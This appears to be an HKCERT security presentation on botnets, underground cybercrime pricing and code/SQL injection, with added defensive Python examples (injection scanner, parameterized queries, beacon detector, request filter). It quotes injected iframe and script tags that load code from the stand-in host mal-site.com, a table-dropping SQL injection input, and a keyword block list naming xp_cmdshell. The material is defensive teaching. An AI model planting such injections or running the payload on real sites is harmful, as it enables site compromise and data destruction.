Botnet and Code Injection Attack

S.C. Leung
CISSP CISA CBCP
HKCERT

Figure: HKCERT's coordination network. CERT teams in Asia Pacific (via APCERT) and CERT teams around the world (via FIRST); local parties: Law Enforcement, Virus & Security Research Centre, Local Enterprise & Internet Users, ISP, Software Vendor, Universities.
Page ! 2
Agenda

Botnet and Code Injection Attack
- Cyberspace – the New Business Platform for Whom?
  - Incentives of Cyber Attack
  - The Underground Economy
- Botnet – Attacker's infrastructure
- Code Injection & SQL Injection Attack
- Protection Strategies




Page ! 3
Cyberspace - the New Business Platform for Whom?

Cybercrime for Sale

Services:

DDoS attacks
The price usually depends on the attack time:
    1 hour - US$10-20 (depends on the seller)
    2 hours - US$20-40
    1 day - US$100
    More than 1 day - from US$200 (depends on the complexity of the job)
It is worth highlighting that they normally offer 10 minutes of testing: if you are interested, you tell them the server and they will perform a DoS attack on it for 10 minutes, so that you can evaluate the 'service'.

Spam hosting: US$200
Dedicated spam server: US$500
    + 10,000,000 mails per day: US$600
SMS spam (per message): US$0.2
ICQ (1,000,000): US$150

Mailing lists for spam (prices in US$):
    Accounts     USA    Germany   Russia   Ukraine
    1,000,000    100    100       100      100
    3,000,000    200    200       200      200
    5,000,000    300    300       300      -
    8,000,000    500    500       500      -
    16,000,000   900    -         -        -
    32,000,000   1500   -         -        -

Hiding of executable files, to avoid antivirus programs and firewalls (they guarantee that the files won't be detected even by the antivirus updates of the date of purchase): from US$1 to US$5 per executable file (cheap, isn't it?)
FTP accounts: US$1 per account
50MB of Limbo Trojan logs: US$30 (contains email accounts, bank account #, credit card #, etc. A percentage is guaranteed)
ICQ numbers: from US$1 to US$10 (depending on the ICQ number)
RapidShare premium accounts:
    1 month - US$5
    2 months - US$8
    3 months - US$12
    6 months - US$18
    1 year - US$28
Online shop accounts (megashop.ru, bolero.ru, cup.ru, etc., all Russian): US$50 each.
Page ! 5
Incentives of Cyber Attacks

Incentives: financial, political, or for fun (achievement, financial gain, fun and interest, political or religious motives, revenge)

- Piracy: theft of CD keys
- Theft of personal information and identification (SSN, id, password, credit card #)
- Spam: paid spam relays
- Phishing attacks: paid web hosting
- Spyware/adware installation: pay per installation
- Click fraud: pay per click
- DDoS: extortion, or attack on a competitor's service site
- Blackmail / Ransomware: encrypts hard drive data, then demands a ransom



Page ! 6
Visibility of Malware vs. Malicious Intent

Figure: visibility plotted against malicious intent over time. Mass mailing viruses and worms by hacking sit at the high-visibility, "fame and glory" end; phishing and botnets sit at the low-visibility, high-malicious-intent end, where highly profitable cybercrime is.
Source: GOVCERT.NL, http://www.oecd.org/dataoecd/34/36/38653287.pdf

Page ! 7
Botnet - Attackers' IT Infrastructure
Botnet (roBot Network)

Figure: the bot herder sits at the top; below are several C&C (command and control) servers, and below them the bots. Downstream traffic carries commands and updates (bot herder to C&C to bots); upstream traffic carries data (bots to C&C to bot herder). The bots are used for spam and for DDoS attacks against victims.

Page ! 9
Wikipedia is not totally correct on "botnet": a botnet is much more than a DDoS platform.
Botnet Fire Power in Real Fight

- Estonia DDoS (2007-May)
  - 58 Estonian web sites encountered DDoS attacks from thousands of botnet computers
  - Response to Estonia relocating a Soviet-era memorial
  http://news.cnet.com/8301-10784_3-9721429-7.html?hhTest=1

- CNN DDoS (2008-Apr)
  - CNN filtered traffic in response to the disruption attempts, which affected some Asian users
  - Response to CNN's report on Tibet
  http://www.infoworld.com/article/08/04/23/CNN-site-hit-by-China-attack_1.html

- Lithuania mass defacement (2008-Jul)
  - 300 web sites defaced with pro-Russian slogans
  - Response to a law outlawing Soviet symbols in Lithuania
  http://news.cnet.com/8301-10789_3-9983940-57.html?hhTest=1


Page ! 10
Malware 2.0

Evade detection
- Keep a low profile (see figure)
- Encrypt or encode
- Keep on changing; use rootkit technology
- Targeted attack
- Terminate security software
- Test against known AV software

Command and control
- Receive data from victim
- Command victim action
- Malware update
  - Patch / upgrade
  - AV detection signature




Page ! 11
Attackers Expand the Botnet Colony

Maximizing malware attack surface
Legitimate sites compromised to host malware

Page ! 13
Legitimate site with embedded third party information serving malware

- Embedded third party information (and banner ads) on a web page is something hard for a web master to control
  - Travel sites and music service sites have many banner ads
  - News sites subscribe to third party financial information from, for example, aastocks.com




Page ! 14
Redirection of attacks
- Exploits imported from other servers via iframes and redirects

Figure: the browser sends a web request to a malicious (compromised) web server, which redirects it to an exploit server; the exploit server serves the exploit page back to the browser. The figure shows two malicious web servers both redirecting their visitors to the same exploit server.



Page ! 15
Web-borne Malware Infection

- ScanSafe Report 2008 (May-07 to May-08)
  http://www.scansafe.com/threat_center/threat_alerts/stat_security_brief
  - 66% of malware comes from legitimate sites
  - Web-borne malware up 278%
  - 76% SQL injection

- Websense Report Jan 2008
  - 51% of points of infection were compromised legitimate sites

Figure: pie chart "Web Attack 2008 H1 (ScanSafe)": SQL injection 76%; the remaining slices (12%, 7%, 5%) are PHP, stolen FTP credentials and others.




Page ! 16
Bulletproof hosting

- Guarantee access to their network
  - Gain access to the network with trusted BGP peers so as to get their network existence announced
  - Use other 'friendly' service providers to host their service
    - Good bandwidth and lax control
- A report "Atrivo - Cyber Crime USA" in 2008 disclosed that the network service provider Atrivo (or Intercage) failed to respond to abuse from hosts inside their network.
  http://rbnexploit.blogspot.com/2008/08/rbn-atrivo-cyber-crime-usa.html




Page ! 17
Code Injection
iFrame (掛馬, the Chinese term for planting a Trojan through a web page)

- A trustworthy web site with a vulnerability is compromised, and an "invisible" script is injected into its web page.
  - e.g.
    <iframe width=1 height=1 src="http://www.mal-site.com/">
    </iframe>
  - A visitor of the web page is transparently redirected to another web site which hosts the malicious script.
    <script src=http://www.mal-site.com/1.js></script>

- Attraction to hackers:
  - Better reach to victims
  - Easier management
  - More difficult to investigate
Page ! 19
Code Injection
- No visible injected code on the web page

Figure: the web page looks fine on the face; the embedded malicious script is only seen when the page source is examined.
Page ! 20
Code injection: Evasion of detection

- Code obfuscation
  - Evades signature-based detection
  - Watch for these: eval(), arguments.callee




Page ! 21
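As an added illustration of the two code-injection slides above (this is not code from the slides or from HKCERT), the Python below walks a page's HTML and flags the three markers they describe: a tiny or hidden iframe, a script pulled from a host other than the site's own, and an inline script that uses eval(), arguments.callee or a similar decoding loader. The sample page, the site host www.example.com and the marker list are constructed for the example.

```python
"""Scan a page's HTML for the injection markers described in the slides:
hidden iframes, scripts loaded from a foreign host, and inline scripts that use
eval() / arguments.callee style loaders. Added example, not HKCERT code; the
sample page, host name and marker list below are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings whose presence in an inline script is worth a second look (constructed list).
OBFUSCATION_MARKERS = ("eval(", "arguments.callee", "unescape(", "fromCharCode")


def _tiny(value):
    """True for width/height attributes of 0 or 1 (with or without a 'px' suffix)."""
    v = value.strip().lower().rstrip("px")
    return v.isdigit() and int(v) <= 1


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings; site_host is the host the page belongs to."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_inline_script = False
        self._script_buf = []

    def _is_foreign(self, url):
        host = urlparse(url).hostname
        return host is not None and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            w, h, src = a.get("width", ""), a.get("height", ""), a.get("src", "")
            hidden = "display:none" in a.get("style", "").replace(" ", "").lower()
            if (w and h and _tiny(w) and _tiny(h)) or hidden:
                self.findings.append(("hidden_iframe", src))
            elif self._is_foreign(src):
                self.findings.append(("foreign_iframe", src))
        elif tag == "script":
            src = a.get("src")
            if src is not None and self._is_foreign(src):
                self.findings.append(("foreign_script", src))
            # Only a script without src has a body to inspect.
            self._in_inline_script = src is None
            self._script_buf = []

    def handle_data(self, data):
        if self._in_inline_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            body = "".join(self._script_buf)
            hits = [m for m in OBFUSCATION_MARKERS if m in body]
            if hits:
                self.findings.append(("obfuscated_inline_script", ",".join(hits)))
            self._in_inline_script = False


def scan_html(html, site_host):
    """Return the list of (kind, detail) findings for one page."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate-looking page carrying the slide's two injected
# tags plus an obfuscated inline loader.
SAMPLE_PAGE = """<html><head><title>Welcome</title>
<script src="/js/site.js"></script>
<script src=http://www.mal-site.com/1.js></script>
</head><body>
<h1>Hello</h1>
<iframe width=1 height=1 src="http://www.mal-site.com/"></iframe>
<script>var p='%75%6e';eval(unescape(p));</script>
<script>document.title = 'ok';</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, "www.example.com"):
        print(kind, detail)
```

Run over a site's own pages on a schedule, a scanner like this catches the "looks fine on the face" case: the page renders normally, but the findings list is not empty. Scripts served from the site's own host are not flagged, so a compromised first-party script still needs a content hash or a code review to be noticed.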
SQL Injection
HTTP Request/Response - Static Webpage

Figure: 1. The User Agent (client) requests a webpage from the Web Server; 4. the Web Server sends the webpage back.
Page ! 23
HTTP Request/Response - Dynamic Webpage

Figure: user input goes in; dynamic content depending on the user input comes out.


Page ! 24
HTTP Request/Response - Dynamic Webpage

Figure: 1. The User Agent (client) requests a webpage; 2. the Web Server processes the request and requests data from the Database Server; 3. the data is loaded; 4. the Web Server sends the webpage.




Page ! 25
HTTP Request/Response

Figure: 1. The User Agent (client) requests a webpage; 2. the Web Server processes the request and requests data; 3. the Database Server loads the data; 4. the Web Server sends the webpage; 5. the client submits a form with data; the Web Server processes the form data via CGI/ASP/PHP/JSP...; 6. the data is stored in the Database Server; 7. data is loaded; 8. the Web Server sends a webpage with the results.
Page ! 26
SQL Injection

- What is "SQL Injection"?
  - A web application creates SQL commands on the fly,
  - but unvalidated user input may cause the execution of unintended code.
  - Example: SQL command with user input

        SELECT passwd FROM USERS WHERE uname = '$INPUT';

  - Hacker: $INPUT = "dummy' AND 1=0; DROP USERS" (the AND 1=0 makes the WHERE clause always false)
  - System sees:

        SELECT passwd FROM USERS WHERE uname = 'dummy' AND 1=0; DROP USERS;'

Figure: a "Sign up for Hahoo!" form ("Already have a Hahoo! ID?") with the Hahoo! ID field filled with dummy' AND 1=0; DROP USERS
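To show the slide's example running, here is an added example (not from the slides or HKCERT) that builds the lookup both ways against an in-memory SQLite table: once by pasting the input into the SQL string, as the slide's `'$INPUT'` template does, and once with a bound parameter. The USERS table, its single row and the password value are constructed.

```python
"""The slide's lookup, first built by string concatenation and then with a
parameterized query, run against an in-memory SQLite table. Added example, not
HKCERT code; the table, the row in it and the password value are constructed."""
import sqlite3

# The exact input shown on the slide.
SLIDE_INPUT = "dummy' AND 1=0; DROP USERS"


def setup_db():
    """Constructed USERS table with one row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (uname TEXT PRIMARY KEY, passwd TEXT)")
    conn.execute("INSERT INTO USERS VALUES ('alice', 'constructed-hash')")
    conn.commit()
    return conn


def build_vulnerable_query(user_input):
    """The slide's SELECT passwd FROM USERS WHERE uname = '$INPUT'; with the input pasted in."""
    return "SELECT passwd FROM USERS WHERE uname = '" + user_input + "';"


def lookup_vulnerable(conn, user_input):
    """Run the concatenated query. Returns the passwd, None for no match, or
    'REFUSED' when the driver rejects the SQL. sqlite3 refuses a second statement
    after the ';', so the DROP is stopped by the driver here, not by the
    application; a driver or API that accepts stacked statements would run it."""
    try:
        row = conn.execute(build_vulnerable_query(user_input)).fetchone()
    except (sqlite3.Error, sqlite3.Warning):
        return "REFUSED"
    return row[0] if row else None


def lookup_parameterized(conn, user_input):
    """Same lookup with a bound parameter: the input is only ever a string value,
    so the quote, the AND and the ';' inside it never reach the parser as syntax."""
    row = conn.execute("SELECT passwd FROM USERS WHERE uname = ?", (user_input,)).fetchone()
    return row[0] if row else None


def table_exists(conn, name):
    """True if a table of that name is still present."""
    return conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone() is not None


if __name__ == "__main__":
    db = setup_db()
    print(build_vulnerable_query(SLIDE_INPUT))     # what the system sees
    print(lookup_vulnerable(db, SLIDE_INPUT))      # REFUSED by the driver
    print(lookup_parameterized(db, SLIDE_INPUT))   # None: no user with that literal name
    print(lookup_parameterized(db, "alice"))       # constructed-hash
```

The point of the pair is that the parameterized version needs no knowledge of which characters are dangerous: the whole input is one value, so the slide's string simply matches no user. The concatenated version only survives here because this particular driver refuses stacked statements, which is luck, not a defence.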

Page ! 27
Live Demo
Using SQL Injection to implant and execute a file

Root Cause of Injection
No validation and sanitization of user inputs

Code / SQL Injection

Figure: the dynamic-webpage flow again (1. request webpage; 2. request data; 3. load data; 4. send webpage), but in step 5 the client submits the form with data plus a malformed string; the Web Server processes the form data via CGI/ASP/PHP/JSP... and the SQL attack goes along with it; 6. the data is stored in the Database Server.




Page ! 30
More Attacker Tactics
Redirect users to fake plug-in/codec sites

- Surge in Facebook malware, 15-Oct-2008
- TRUST:
  - Malware spoofs a user's friend, sending a message with a URL purporting to be a YouTube movie
- REDIRECT:
  - The URL brings the user to a fake YouTube site
  - "Flash_update.exe"
  http://www.f-secure.com/weblog/archives/00001517.html



Page ! 32
Password Reset Attack, and Search Query Poisoning




Page ! 33
Protection Strategies
Hit criminals' critical infrastructure

- Trace the supply chain of criminals (Law Enforcement)
- Bring down their infrastructure (ISP, DNR)
  - C&C, malicious web sites, fake domain names
  - Domain name registries manage domain registration abuse
  - ISPs unplug malware hosting networks
- Bring down spam-borne attacks
  - Corporations and ISPs adopt Port 25 management (blocks direct SMTP on port 25); this forces spammers to use credentials, which is more accountable (advocated by APWG, CERT)
    http://www.maawg.org/port25/
Page ! 35
Botnet Take Down

- Jun-2007: FBI "Operation Bot Roast" identified 1M+ victim computers. Arrested 3 persons, including spam king Robert Soloway (47 months' imprisonment)
- Oct-2008: Atrivo/Intercage, malware hosting in the USA, unplugged
- Nov-2008: McColo, a hosting provider in the USA, unplugged. Spam volume dropped by 2/3.
- Nov-2008: ICANN de-accredited EstDomains, whose CEO was convicted of credit card fraud, money laundering, and document forgery.

Page ! 36
Client Defense

- Malicious web sites
  - Browsers add anti-malware and anti-phishing features
    - IE, Mozilla, Opera; add the Netcraft toolbar if you want
    - Mind your browser and plug-ins
- Malware morphs too fast to be detected
  - Baseline defence (anti-malware, firewall, patching) is still required, though insufficient
  - Blacklisting falls short; the whitelist approach is proposed but open to debate
- Detect botnets
  - Monitor OUTGOING network traffic for botnet activity


Page ! 37
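To make "monitor OUTGOING network traffic for botnet" concrete, here is an added example (not HKCERT tooling) that reads constructed outbound flow records (epoch time, source IP, destination IP, destination port) and flags a host that contacts the same external endpoint at a near-constant interval, the regular check-in a bot makes to poll its C&C server. The record format, the thresholds and the flows themselves are constructed assumptions.

```python
"""Flag periodic outbound connections ('beaconing') in constructed flow records,
the kind of OUTGOING-traffic monitoring the slide suggests for spotting a bot
polling its C&C server. Added example, not HKCERT tooling; the record format,
thresholds and flows are constructed."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed records: "<epoch seconds> <src_ip> <dst_ip> <dst_port>", outbound only.
# 10.0.0.5 checks in with the same endpoint every ~30 s; 10.0.0.7 browses irregularly.
FLOWS = """\
1000 10.0.0.5 203.0.113.9 6667
1030 10.0.0.5 203.0.113.9 6667
1061 10.0.0.5 203.0.113.9 6667
1090 10.0.0.5 203.0.113.9 6667
1121 10.0.0.5 203.0.113.9 6667
1150 10.0.0.5 203.0.113.9 6667
1003 10.0.0.7 198.51.100.20 443
1007 10.0.0.7 198.51.100.20 443
1200 10.0.0.7 198.51.100.20 443
1205 10.0.0.7 198.51.100.20 443
1500 10.0.0.7 198.51.100.20 443
1502 10.0.0.7 198.51.100.20 443
"""


def parse_flows(text):
    """Parse the record format above into (epoch, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((int(ts), src, dst, int(dport)))
    return flows


def find_beacons(flows, min_connections=5, max_cv=0.2):
    """Group flows by (src, dst, dport) and flag groups with at least min_connections
    whose gaps between connections are nearly constant (coefficient of variation
    of the gaps <= max_cv). Irregular, human-driven traffic has a high cv."""
    groups = defaultdict(list)
    for ts, src, dst, dport in flows:
        groups[(src, dst, dport)].append(ts)
    alerts = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0:
            continue
        cv = pstdev(gaps) / period
        if cv <= max_cv:
            alerts.append({"src": src, "dst": dst, "dport": dport, "count": len(times),
                           "period_s": round(period, 1), "cv": round(cv, 3)})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(parse_flows(FLOWS)):
        print(alert)
```

In practice the input would be NetFlow or proxy logs over a longer window, and known update servers would be excluded first, since legitimate software also polls on a timer; the detector only narrows the list of hosts worth a closer look, it does not prove infection.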
Coping with morphing malware

- Malware morphs too fast to be detected
  - Sandbox: malware analysis by behaviour
- Use the whitelist approach instead of blacklists
- Security awareness comes into play, so more education!

(Screenshot: http://www.threatexpert.com/reports.aspx)
Page ! 38
Google Safe Browsing

  Firefox and Flock browser now incorporate Google safety alert.




Page ! 39
Server Defense

- Minimize and guard all entry points
- Close all flaws in the application
  - Hackers look into applications; network-filtering firewalls are blind to application attacks
- Back to basics: treat ALL user input as EVIL!
  - Validate all inputs in web applications
  - Runtime vulnerability assessment
  - Application firewall: modsecurity, URLScan



Page ! 40
Prevention and Detection of Code/SQL Injection

1. Code-level
   - Coding practice, code scanning
   - This is the ultimate defense
2. Database-level
   - Minimum privilege for the database user account
   - Avoid some commands
3. Vulnerability scanning
   - Scan for SQL injection vulnerabilities
4. Application firewall / HTTP filtering
   - Use modsecurity and URLScan to block sensitive commands
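As an added example of levels 1 and 4 (not from the slides or HKCERT's guideline), the Python below pairs an allow-list input validator with a small request filter of the kind modsecurity or URLScan rules implement: it decodes the query string of a constructed HTTP request line and reports which parameters carry characters or keywords that have no business in a username field. The allow-list pattern, the keyword list and the request lines are constructed.

```python
"""Code-level validation and HTTP-level filtering for the injection case on the
slides. Added example, not HKCERT code; the username policy, the keyword list and
the request lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Level 1 (code): allow-list for a username field. Anything outside it is rejected
# before it gets near a query, which is the "ultimate defense" the slide names.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def validate_username(value):
    """True only if the whole value is 3-32 characters from the allowed set."""
    return USERNAME_RE.fullmatch(value) is not None


# Level 4 (HTTP filter): tokens a perimeter rule would treat as sensitive. A
# constructed list in the spirit of "block sensitive commands"; it is a backstop,
# not a substitute for level 1, because it can both miss and over-match.
SENSITIVE = re.compile(r"(?i)\b(drop|union|insert|delete|update|exec|xp_cmdshell)\b|--|;|'")


def inspect_request(request_line):
    """Return the names of query parameters whose decoded value matches SENSITIVE."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    flagged = set()
    for name, values in params.items():
        if any(SENSITIVE.search(v) for v in values):
            flagged.add(name)
    return sorted(flagged)


def filter_log(request_lines):
    """Run inspect_request over many request lines; return (line, flagged) for the hits."""
    hits = []
    for line in request_lines:
        flagged = inspect_request(line)
        if flagged:
            hits.append((line, flagged))
    return hits


# Constructed request lines: a normal login, the slide's input URL-encoded, and an
# honest value that trips the filter.
REQUESTS = [
    "GET /login?uname=alice&lang=en HTTP/1.1",
    "GET /login?uname=dummy%27+AND+1%3D0%3B+DROP+USERS HTTP/1.1",
    "GET /search?q=o%27brien HTTP/1.1",
]

if __name__ == "__main__":
    for line, flagged in filter_log(REQUESTS):
        print(flagged, line)
```

The third request shows why keyword filtering is level 4 and not level 1: "o'brien" is a legitimate search term, yet the apostrophe trips the rule, while the allow-list in validate_username rejects the slide's input without any list of bad words at all.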




Page ! 41
Prevention and Detection of Code Injection

Figure: the Code/SQL injection flow (request webpage, request data, load data, send webpage; submit form with data plus malformed string; process form data via CGI/ASP/PHP/JSP... with the SQL attack; store data), annotated with where each defence sits: the Application Firewall in front of the Web Server, Vulnerability Assessment and Code review of web apps at the Web Server, and Database-level validation at the Database Server.
Page ! 42
HKCERT Guideline

- SQL Injection Protection Guideline (SQL 資料隱碼防護指引)
  http://www.hkcert.org/english/sguide_faq/sguide/sql_injection_en.pdf
  http://www.hkcert.org/chinese/sguide_faq/sguide/sql_injection_en.pdf




Page ! 43
   Q&A


S.C. Leung (梁兆昌)
 scleung@hkcert.org

				